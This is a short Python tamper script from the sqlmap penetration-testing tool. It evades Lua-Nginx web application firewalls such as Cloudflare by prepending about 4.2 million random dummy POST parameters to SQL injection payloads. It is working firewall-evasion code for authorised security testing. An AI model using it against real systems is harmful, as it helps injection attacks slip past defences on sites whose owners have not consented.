1
#!/usr/bin/env python
2

3
"""
4
Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5
See the file 'LICENSE' for copying permission
6
"""
7

8
import random
9
import string
10
import os
11

12
from lib.core.compat import xrange
13
from lib.core.common import singleTimeWarnMessage
14
from lib.core.enums import HINT
15
from lib.core.enums import PRIORITY
16
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
17

18
__priority__ = PRIORITY.HIGHEST
19

20
def dependencies():
21
    singleTimeWarnMessage("tamper script '%s' is only meant to be run on POST requests" % (os.path.basename(__file__).split(".")[0]))
22

23
def tamper(payload, **kwargs):
24
    """
25
    LUA-Nginx WAFs Bypass (e.g. Cloudflare) with 4.2 million parameters
26

27
    Reference:
28
        * https://opendatasecurity.io/cloudflare-vulnerability-allows-waf-be-disabled/
29

30
    Notes:
31
        * Lua-Nginx WAFs do not support processing of huge number of parameters
32
    """
33

34
    hints = kwargs.get("hints", {})
35
    delimiter = kwargs.get("delimiter", DEFAULT_GET_POST_DELIMITER)
36

37
    hints[HINT.PREPEND] = delimiter.join("%s=" % "".join(random.sample(string.ascii_letters + string.digits, 2)) for _ in xrange(4194304))
38

39
    return payload
40

41